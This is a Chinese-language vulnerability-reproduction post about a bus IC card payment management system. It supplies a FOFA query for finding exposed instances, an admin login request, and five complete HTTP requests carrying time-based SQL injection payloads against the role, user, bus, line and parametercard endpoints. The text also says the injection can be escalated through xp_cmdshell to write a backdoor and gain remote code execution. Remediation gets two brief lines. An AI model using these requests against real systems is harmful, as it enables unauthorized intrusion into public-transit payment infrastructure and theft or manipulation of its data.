当前位置: 首页 > news >正文

【漏洞复现】公交IC卡收单管理系统 SQL注入致RCE漏洞复现


》》》产品描述《《《

        公交IC卡收单 管理系统Q是城市公共交通领域中不可或缺的一部分,它通过集成先进的集成电路技术(IC卡)实现了乘客便捷的支付方式,并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块,为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验,还降低了公交公司的运营成本,提高了管理效率。


》》》漏洞描述《《《

        公交IC卡收单管理系统 role、user、bus、line、parametercard 等多个接口存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句,调用xp cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。


》》》搜索语句《《《

FOFA:app="公交IC卡收单管理系统"


》》》漏洞复现《《《

先利用登录请求包获取Cookie

POST /login HTTP/1.1
Host: 
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Priority: u=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequestusername=admin&password=e10adc3949ba59abbe56e057f20f883e

POC-1  公交IC卡收单管理系统role存在SQL注入漏洞

POST /role HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest_search=false&nd=1727245571646&rowCountPerPage=10&pageNo=1&sidx=ROLE_NAME&sord=asc&method=select&ROLE_NAME=1');WAITFOR DELAY '0:0:5'--

POC-2  公交IC卡收单管理系统user存在SQL注入漏洞 

POST /user HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8_search=false&nd=1727245865182&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=1');WAITFOR DELAY '0:0:5'--&REAL_NAME=1&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5

POC-3  公交IC卡收单管理系统bus存在SQL注入漏洞

POST /bus HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2_search=false&nd=1727248354972&rowCountPerPage=10&pageNo=1&sidx=BUS_CODE&sord=asc&method=select&BUS_CODE=1');WAITFOR DELAY '0:0:5'--

POC-4  公交IC卡收单管理系统line存在SQL注入漏洞

POST /line HTTP/1.1
Host: 
Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Priority: u=0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8_search=false&nd=1727248712232&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&method=select&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--

POC-5  公交IC卡收单管理系统parametercard存在SQL注入漏洞

POST /parametercard HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Priority: u=0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflatemethod=select&organization=&lineCode=&_search=false&nd=1727249021156&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--

 RCE


》》》修复建议《《《

关闭互联网暴露面或接口设置访问权限
升级至安全版本



http://www.mrgr.cn/news/37828.html

相关文章:

  • 洛谷 AT_abc275_c [ABC275C] Counting Squares 题解
  • Matlab 软件入门
  • Diameter协议
  • 深入探索 PyTorch 在机器学习中的应用
  • 2024 CSP 游记
  • C++入门day5-面向对象编程(终)
  • 降AI率不再难:芝士AI去痕工具,让论文原创性飙升~~~
  • 组播基础-2-IGMP协议
  • 个人网站介绍和部署(开源)
  • 智能编辑器、版本控制与自动化脚本
  • Vert.x,Databases
  • 是否是递增的字符串(c语言)
  • Python画笔案例-067 绘制配乐七角星
  • 「漏洞复现」誉龙视音频综合管理平台 RelMedia/FindById SQL注入漏洞
  • 【中级通信工程师】终端与业务(十一):市场营销计划、实施与控制
  • 深度学习:迁移学习
  • 深入理解 `torch.nn.Linear`:维度变换的过程详解与实践(附图、公式、代码)
  • 深入 Spring RestTemplate 源码:掌握 HTTP 通信核心技术
  • ROS与无人驾驶学习笔记(一)——ROS基本操作
  • 【智享AI直播官网】—智享AI直播源码部署—OEM贴牌!